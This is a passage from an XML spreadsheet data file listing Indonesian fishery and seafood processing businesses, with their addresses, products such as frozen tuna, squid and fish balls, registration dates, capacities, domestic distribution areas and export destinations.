    <n v="18"/>
    <s v="Bandeng Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Lombok Tengah"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23099"/>
    <x v="799"/>
    <s v="LEZZATO CAMILAN BEKU"/>
    <s v="Madulegi RT 04 RW 10, Kel. Plintahan, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Samosa Ikan)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="240"/>
    <s v="Kota Semarang, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Pasuruan, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23101"/>
    <x v="800"/>
    <s v="POKLAHSAR HIKMAH"/>
    <s v="RT 01 RW 11 Lingkungan Teleng, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abon Tuna"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kabupaten Wonogiri, Kota Surakarta, Kota Yogyakarta, Kabupaten Pacitan, Kabupaten Ponorogo, Kabupaten Trenggalek, Kota Madiun, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23102"/>
    <x v="800"/>
    <s v="POKLAHSAR HIKMAH"/>
    <s v="RT 01 RW 11 Lingkungan Teleng, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Tahu Bakso Ikan, Bakso Ikan)"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Pusat, Kota Surakarta, Kota Semarang, Kota Yogyakarta, Kabupaten Ponorogo, Kabupaten Trenggalek, Kabupaten Magetan, Kota Madiun, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23105"/>
    <x v="801"/>
    <s v="NAVAR BAHARI RAYA"/>
    <s v="Dusun Bengkal RT 04 RW 04, Kel. Tanjungsari, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asap"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Yogyakarta, Kabupaten Pacitan, Kabupaten Ponorogo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23106"/>
    <x v="801"/>
    <s v="NAVAR BAHARI RAYA"/>
    <s v="Dusun Bengkal RT 04 RW 04, Kel. Tanjungsari, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Naget Tuna, Siomay Tuna, Kaki Naga Tuna, Tahu Tuna, Dimsum Tuna, Rolade Tuna, Sempol Tuna, Bakso Tuna) "/>
    <d v="2021-02-11T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat, Kota Semarang, Kabupaten Pacitan, Kabupaten Ponorogo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23107"/>
    <x v="802"/>
    <s v="PT. SAMUDERA TIGA SEJAHTERA"/>
    <s v="Jl. Muara Baru  Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23108"/>
    <x v="802"/>
    <s v="PT. SAMUDERA TIGA SEJAHTERA"/>
    <s v="Jl. Muara Baru  Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Cakalang)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23109"/>
    <x v="802"/>
    <s v="PT. SAMUDERA TIGA SEJAHTERA"/>
    <s v="Jl. Muara Baru  Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Kakap Merah)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23110"/>
    <x v="802"/>
    <s v="PT. SAMUDERA TIGA SEJAHTERA"/>
    <s v="Jl. Muara Baru  Ujung Blok T No.12, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23111"/>
    <x v="803"/>
    <s v="JIMMY"/>
    <s v="Jl. Nusantara Laut RT 004 RW 005, Kel. Tanjungbalai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kerisi, Jahan, Manyung, Kerapu, Kakap, Kaci-kaci)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Karimun, Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23112"/>
    <x v="804"/>
    <s v="WANDI, SE"/>
    <s v="Jl. Antena Baran Dua Meral RT 003 RW 004, Kel. Meral, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kerisi, Jahan, Manyung, Kerapu, Kakap, Kaci-kaci)"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Karimun, Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23113"/>
    <x v="805"/>
    <s v="CV, DOLPHIN"/>
    <s v="Jl, Khatulistiwa Km 6 No,602, Kel, Batulayang, Kec, Pontianak Utara, Kota Pontianak&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Bakso Ikan, Bakso Ikan Dengan Wortel"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="18211"/>
    <s v="Kabupaten Sambas, Kabupaten Ketapang, Kabupaten Sintang, Kota Pontianak, Kota Singkawang"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23115"/>
    <x v="805"/>
    <s v="CV, DOLPHIN"/>
    <s v="Jl, Khatulistiwa Km 6 No,602, Kel, Batulayang, Kec, Pontianak Utara, Kota Pontianak&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Ikan Olahan Lapis Kulit Tahu"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="63500"/>
    <s v="Kabupaten Ketapang, Kabupaten Sintang, Kota Pontianak, Kota Singkawang"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23116"/>
    <x v="805"/>
    <s v="CV, DOLPHIN"/>
    <s v="Jl, Khatulistiwa Km 6 No,602, Kel, Batulayang, Kec, Pontianak Utara, Kota Pontianak&lt;br&gt;Kalimantan Barat"/>
    <n v="20"/>
    <s v="Kue Ikan"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="37400"/>
    <s v="Kabupaten Sambas, Kabupaten Ketapang, Kota Pontianak, Kota Singkawang"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23122"/>
    <x v="806"/>
    <s v="POKLAHSAR BERKAH SAMUDRA"/>
    <s v="RT 01 RW 11 Lingkungan Teleng, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Tahu Tuna, Nugget Ikan, Siomay Ikan))"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Jakarta Pusat, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23123"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Cakalang, Tenggiri)"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="800000"/>
    <m/>
    <s v="China, Hong Kong, India, Korea, Democratic People's Republic of, Kuwait, Malaysia, Saudi Arabia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23124"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Hiu Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="800000"/>
    <m/>
    <s v="China, Hong Kong, India, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23125"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="800000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Kuwait, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23126"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Pari Segar"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23127"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23128"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23129"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23130"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Hong Kong, India, Korea, Democratic People's Republic of, Kuwait, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="23131"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="23132"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23133"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23134"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="445000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="23135"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rajungan Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="445000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="23136"/>
    <x v="807"/>
    <s v="PT, BAHARI MULIA UTAMA"/>
    <s v="Kawasan Industri Candi, Jl, Gatot Subroto Blok F6, Kel, Purwoyoso, Kec, Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2021-01-14T00:00:00"/>
    <n v="195270.85"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23138"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23139"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23140"/>
    <x v="808"/>
    <s v="PT. INDONESIA ANEKA PERIKANAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Kawabida, Salem, Layang, Cakalang)"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23141"/>
    <x v="808"/>
    <s v="PT. INDONESIA ANEKA PERIKANAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu)"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23142"/>
    <x v="808"/>
    <s v="PT. INDONESIA ANEKA PERIKANAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23143"/>
    <x v="808"/>
    <s v="PT. INDONESIA ANEKA PERIKANAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room Nomor 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Scallop Beku"/>
    <d v="2020-12-03T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23144"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Deho, Kembung, Marlin, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="23145"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Manyung, Kerapu, Layur, Bawal, Jenggot, Rejung, Kakap, Kurisi)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="23146"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="23147"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="23148"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="23149"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23150"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="23151"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23152"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="23153"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Bandeng, Patin, Nila)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="23154"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan, Malaysia"/>
  </r>
  <r>
    <n v="23155"/>
    <x v="809"/>
    <s v="PERUM PERIKANAN INDONESIA CABANG BRONDONG"/>
    <s v="Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teri Beku"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23156"/>
    <x v="810"/>
    <s v="PT. SINAR MUTIARA EXPRES"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="23158"/>
    <x v="810"/>
    <s v="PT. SINAR MUTIARA EXPRES"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Philippines, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23159"/>
    <x v="810"/>
    <s v="PT. SINAR MUTIARA EXPRES"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cacing Laut Kering"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Philippines, Viet Nam"/>
  </r>
  <r>
    <n v="23160"/>
    <x v="810"/>
    <s v="PT. SINAR MUTIARA EXPRES"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23161"/>
    <x v="810"/>
    <s v="PT. SINAR MUTIARA EXPRES"/>
    <s v="Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23164"/>
    <x v="755"/>
    <s v="PT. SABINDO RAYA GEMILANG"/>
    <s v="Jl. Gajah Mada, Kel. Karang Rejo, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="1800"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="23166"/>
    <x v="811"/>
    <s v="PT, MISAJA MITRA"/>
    <s v="Jl, Veteran KM 02, Kel, Dirgahayu, Kec, Pulau Laut Utara, Kabupaten Kota Baru&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23167"/>
    <x v="811"/>
    <s v="PT. MISAJA MITRA"/>
    <s v="Jl. Veteran KM 02, Kel. Dirgahayu, Kec. Pulau Laut Utara, Kabupaten Kota Baru&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Demersal Beku (Barramundi,, Kerapu, Kakap, Kuro)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23168"/>
    <x v="811"/>
    <s v="PT. MISAJA MITRA"/>
    <s v="Jl. Veteran KM 02, Kel. Dirgahayu, Kec. Pulau Laut Utara, Kabupaten Kota Baru&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Tenggiri)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23171"/>
    <x v="812"/>
    <s v="PT. MEGAH WAHANA MAKMUR"/>
    <s v="Pelabuhan Muara Baru Ujung Jl. Tuna 1 Blok K4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kota Tangerang"/>
    <s v="China, Japan, Philippines, Thailand"/>
  </r>
  <r>
    <n v="23173"/>
    <x v="812"/>
    <s v="PT. MEGAH WAHANA MAKMUR"/>
    <s v="Pelabuhan Muara Baru Ujung Jl. Tuna 1 Blok K4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
